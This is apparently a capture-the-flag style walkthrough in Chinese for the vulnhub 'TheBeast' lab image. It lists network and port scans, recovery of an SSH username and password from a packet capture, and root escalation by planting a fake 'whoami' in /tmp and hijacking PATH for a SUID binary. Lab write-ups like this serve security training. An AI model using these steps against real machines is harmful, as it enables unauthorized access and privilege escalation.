本周实践的是vulnhub的TheBeast镜像,
下载地址,https://download.vulnhub.com/thebeast/TheBeast.zip,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.131.0/24,
获取到靶机地址是192.168.131.133,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.131.133,
发现靶机开了65022端口的ssh服务,
尝试登录ssh服务,ssh [email protected] -p65022,
同时抓包,对抓包进行过滤ip.addr==192.168.131.133 && udp,
从抓包中获取到用户名whitepointer,
以及密码Ch@ndr!chthye$,
用获取到的用户名密码重新ssh登录,
ssh [email protected] -p 65022,
登录成功,不是root,需要提权,查找root权限程序,
find / -perm -u=s -type f 2>/dev/null,获取到/usr/bin/root,
查看内容,strings /usr/bin/root,看到里面执行了whoami,
构造假的whoami程序,cd /tmp,echo "/bin/bash" > whoami,
chmod 777 whoami,export PATH=/tmp:$PATH,
执行假的whoami程序,/usr/bin/root,获取到新的shell,id确认是root
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之TheBeast的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论